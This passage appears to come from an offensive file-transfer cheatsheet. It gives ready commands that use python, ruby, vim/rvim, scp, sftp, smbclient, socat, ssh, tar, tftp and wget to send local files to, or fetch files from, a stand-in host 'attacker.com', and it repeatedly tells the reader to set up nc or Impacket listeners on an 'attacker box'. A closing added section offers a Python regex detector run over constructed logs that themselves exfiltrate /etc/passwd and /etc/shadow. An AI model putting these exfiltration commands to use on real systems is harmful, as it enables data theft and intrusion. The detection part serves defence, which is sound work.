    else: import urllib as u, urllib2 as r
    r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))'
  • Serve files in the local folder running an HTTP server.

    export LPORT=8888
    python -c 'import sys; from os import environ as e
    if sys.version_info.major == 3: import http.server as s, socketserver as ss
    else: import SimpleHTTPServer as s, SocketServer as ss
    ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()'

File download.

It can download remote files.

  • Fetch a remote file via HTTP GET request.

    export URL=http://attacker.com/file_to_get
    export LFILE=file_to_save
    python -c 'import sys; from os import environ as e
    if sys.version_info.major == 3: import urllib.request as r
    else: import urllib as r
    r.urlretrieve(e["URL"], e["LFILE"])'
  • Ruby

File upload. It can exfiltrate files on the network. Serve files in the local folder running an HTTP server. This requires version 1.9.2 or later.

export LPORT=8888
ruby -run -e httpd . -p $LPORT

File download. It can download remote files.

Fetch a remote file via HTTP GET request.

export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
ruby -e 'require "open-uri"; download = open(ENV["URL"]); IO.copy_stream(download, ENV["LFILE"])'
  • rvim

File upload. It can exfiltrate files on the network.

  • This requires that rvim is compiled with Python support. Prepend :py3 for Python 3. Send local file via “d” parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.

export URL=http://attacker.com/
export LFILE=file_to_send
rvim -c ':py import vim,sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r, urllib.parse as u
else: import urllib as u, urllib2 as r
r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))
vim.command(":q!")'
  • This requires that rvim is compiled with Python support. Prepend :py3 for Python 3. Serve files in the local folder running an HTTP server.
export LPORT=8888
rvim -c ':py import vim,sys; from os import environ as e
if sys.version_info.major == 3: import http.server as s, socketserver as ss
else: import SimpleHTTPServer as s, SocketServer as ss
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()
vim.command(":q!")'
  • Send a local file via TCP. Run nc -l -p 12345 > "file_to_save" on the attacker box to collect the file. This requires that rvim is compiled with Lua support and that lua-socket is installed.
export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_send
rvim -c ':lua local f=io.open(os.getenv("LFILE"), "rb")
local d=f:read("*a")
io.close(f);
local s=require("socket");
local t=assert(s.tcp());
t:connect(os.getenv("RHOST"),os.getenv("RPORT"));
t:send(d);
t:close();'

File download.

It can download remote files.

  • This requires that rvim is compiled with Python support. Prepend :py3 for Python 3. Fetch a remote file via an HTTP GET request.

    export URL=http://attacker.com/file_to_get
    export LFILE=file_to_save
    rvim -c ':py import vim,sys; from os import environ as e
    if sys.version_info.major == 3: import urllib.request as r
    else: import urllib as r
    r.urlretrieve(e["URL"], e["LFILE"])
    vim.command(":q!")'
  • Fetch a remote file via TCP. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file. This requires that rvim is compiled with Lua support and that lua-socket is installed.

    export LPORT=12345
    export LFILE=file_to_save
    rvim -c ':lua local k=require("socket");
    local s=assert(k.bind("*",os.getenv("LPORT")));
    local c=s:accept();
    local d,x=c:receive("*a");
    c:close();
    local f=io.open(os.getenv("LFILE"), "wb");
    f:write(d);
    io.close(f);'
  • SCP

File upload : It can exfiltrate files on the network. Send a local file to an SSH server.

RPATH=user@attacker.com:~/file_to_save
LPATH=file_to_send
scp $LPATH $RPATH

File download : It can download remote files. Fetch a remote file from an SSH server.

RPATH=user@attacker.com:~/file_to_get
LPATH=file_to_save
scp $RPATH $LPATH
  • SFTP

File upload. It can exfiltrate files on the network. Send a local file to an SSH server.

RHOST=user@attacker.com
sftp $RHOST
put file_to_send file_to_save

File download. It can download remote files. Fetch a remote file from an SSH server.

RHOST=user@attacker.com
sftp $RHOST
get file_to_get file_to_save
  • SMBCLIENT

File upload : It can exfiltrate files on the network. Install Impacket and run sudo smbserver.py share /tmp on the attacker box to collect the file.

smbclient '\\attacker\share' -c 'put file_to_send where_to_save'

File download : It can download remote files. Install Impacket and run sudo smbserver.py share /tmp on the attacker box to send the file.

smbclient '\\attacker\share' -c 'get file_to_get where_to_save'

  • socat

File upload. It can exfiltrate files on the network.

Run socat -u tcp-listen:12345,reuseaddr open:file_to_save,creat on the attacker box to collect the file.

RHOST=attacker.com
RPORT=12345
LFILE=file_to_send
socat -u file:$LFILE tcp-connect:$RHOST:$RPORT

File download : It can download remote files. Run socat -u file:file_to_send tcp-listen:12345,reuseaddr on the attacker box to send the file.

RHOST=attacker.com
RPORT=12345
LFILE=file_to_save
socat -u tcp-connect:$RHOST:$RPORT open:$LFILE,creat
  • SSH

File upload. It can exfiltrate files on the network. Send a local file to an SSH server.

HOST=user@attacker.com
RPATH=file_to_save
LPATH=file_to_send
ssh $HOST "cat > $RPATH" < $LPATH

File download : It can download remote files. Fetch a remote file from an SSH server.

HOST=user@attacker.com
RPATH=file_to_get
LPATH=file_to_save
ssh $HOST "cat $RPATH" > $LPATH
  • tar

File upload : It can exfiltrate files on the network. This only works for GNU tar. Create a tar archive and send it via SSH to a remote location. The attacker box must have the rmt utility installed (it is present by default on Debian-like distributions).

RHOST=attacker.com
RUSER=root
RFILE=/tmp/file_to_send.tar
LFILE=file_to_send
tar cvf $RUSER@$RHOST:$RFILE $LFILE --rsh-command=/bin/ssh

File download : It can download remote files. This only works for GNU tar. Download and extract a tar archive via SSH. The attacker box must have the rmt utility installed (it is present by default on Debian-like distributions).

RHOST=attacker.com
RUSER=root
RFILE=/tmp/file_to_get.tar
tar xvf $RUSER@$RHOST:$RFILE --rsh-command=/bin/ssh
  • tftp

File upload : It can exfiltrate files on the network. Send a local file to a TFTP server.

RHOST=attacker.com
tftp $RHOST
put file_to_send

File download : It can download remote files. Fetch a remote file from a TFTP server.

RHOST=attacker.com
tftp $RHOST
get file_to_get
  • vim

File upload : It can exfiltrate files on the network.

  • This requires that vim is compiled with Python support. Prepend :py3 for Python 3. Send a local file as the “d” parameter of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
export URL=http://attacker.com/
export LFILE=file_to_send
vim -c ':py import vim,sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r, urllib.parse as u
else: import urllib as u, urllib2 as r
r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))
vim.command(":q!")'
  • This requires that vim is compiled with Python support. Prepend :py3 for Python 3. Serve the files in the current directory over HTTP.
export LPORT=8888
vim -c ':py import vim,sys; from os import environ as e
if sys.version_info.major == 3: import http.server as s, socketserver as ss
else: import SimpleHTTPServer as s, SocketServer as ss
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()
vim.command(":q!")'
  • Send a local file via TCP. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. This requires that vim is compiled with Lua support and that lua-socket is installed.
export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_send
vim -c ':lua local f=io.open(os.getenv("LFILE"), "rb")
local d=f:read("*a")
io.close(f);
local s=require("socket");
local t=assert(s.tcp());
t:connect(os.getenv("RHOST"),os.getenv("RPORT"));
t:send(d);
t:close();'

File download : It can download remote files.

  • This requires that vim is compiled with Python support. Prepend :py3 for Python 3. Fetch a remote file via an HTTP GET request.
export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
vim -c ':py import vim,sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r
else: import urllib as r
r.urlretrieve(e["URL"], e["LFILE"])
vim.command(":q!")'
  • Fetch a remote file via TCP. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file. This requires that vim is compiled with Lua support and that lua-socket is installed.
export LPORT=12345
export LFILE=file_to_save
vim -c ':lua local k=require("socket");
local s=assert(k.bind("*",os.getenv("LPORT")));
local c=s:accept();
local d,x=c:receive("*a");
c:close();
local f=io.open(os.getenv("LFILE"), "wb");
f:write(d);
io.close(f);'
  • wget

File upload : It can exfiltrate files on the network.

Send a local file as the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file is sent as-is, so instruct the service not to URL-decode the body. Use --post-data to send hard-coded data instead of a file.

URL=http://attacker.com/
LFILE=file_to_send
wget --post-file=$LFILE $URL

File download : It can download remote files. Fetch a remote file via an HTTP GET request.

URL=http://attacker.com/file_to_get
LFILE=file_to_save
wget $URL -O $LFILE

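From the defender's side, every entry above (editors driven with -c ':py'/':lua' plus a socket or urllib import, tar with --rsh-command, socat with file:/open: addresses, wget --post-file, smbclient put/get, tftp, ruby -run httpd) leaves a recognisable process command line. The following Python is an added example, not part of this cheatsheet: it runs a few such patterns over constructed process-creation log lines (the `ts user=... cmd=...` format and the 203.0.113.5 address are assumptions for the example) and reports which hosts' commands match.

```python
"""Added example: flag command lines that match the living-off-the-land
file-transfer patterns from the cheatsheet. Log format and values below are
constructed for this example, not taken from any real system."""
import re

# Each rule pairs a short name with a regex over the full command line.
RULES = [
    ("editor-python-net", re.compile(
        r"\b(r?vim|vi)\b.*-c\s+'?:py3?\b.*\b(urllib|http\.server|SimpleHTTPServer|socketserver)\b")),
    ("editor-lua-socket", re.compile(r"\b(r?vim)\b.*-c\s+'?:lua\b.*\brequire\(\"socket\"\)")),
    ("tar-rsh-command",   re.compile(r"\btar\b.*--rsh-command=")),
    ("socat-file-pipe",   re.compile(r"\bsocat\b.*\b(file:|open:)")),
    ("wget-post-file",    re.compile(r"\bwget\b.*--post-(file|data)")),
    ("smbclient-transfer", re.compile(r"\bsmbclient\b.*-c\s+'(put|get)\b")),
    ("tftp-client",       re.compile(r"\btftp\b")),
    ("ruby-httpd",        re.compile(r"\bruby\b.*-run\s+-e\s+httpd")),
]

def classify(cmdline):
    """Return the names of every rule the command line matches (may be empty)."""
    return [name for name, rx in RULES if rx.search(cmdline)]

# Constructed log lines in an assumed "timestamp user=<u> cmd=<argv>" shape.
SAMPLE_LOG = [
    "2024-01-01T10:00:01Z user=www-data cmd=tar cvf root@203.0.113.5:/tmp/x.tar /etc/shadow --rsh-command=/bin/ssh",
    "2024-01-01T10:00:02Z user=www-data cmd=vim -c ':lua local s=require(\"socket\"); local t=assert(s.tcp()); t:connect(\"203.0.113.5\",12345)'",
    "2024-01-01T10:00:03Z user=alice cmd=vim /home/alice/notes.txt",
    "2024-01-01T10:00:04Z user=www-data cmd=wget --post-file=/etc/passwd http://203.0.113.5/",
    "2024-01-01T10:00:05Z user=bob cmd=wget https://example.org/index.html -O /tmp/index.html",
    "2024-01-01T10:00:06Z user=www-data cmd=socat -u file:/etc/passwd tcp-connect:203.0.113.5:12345",
]

LINE_RE = re.compile(r"(\S+)\s+user=(\S+)\s+cmd=(.*)$")

def scan(lines):
    """Parse each log line and return (timestamp, user, matched_rules) for hits only."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # malformed line: skip rather than crash the scan
        names = classify(m.group(3))
        if names:
            hits.append((m.group(1), m.group(2), names))
    return hits

if __name__ == "__main__":
    for ts, user, names in scan(SAMPLE_LOG):
        print(f"{ts} {user}: {', '.join(names)}")
```

Ordinary editor and wget use (the alice and bob lines) produces no hit, so the rules key on the transfer-specific arguments rather than on the binary name alone.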
Sources : -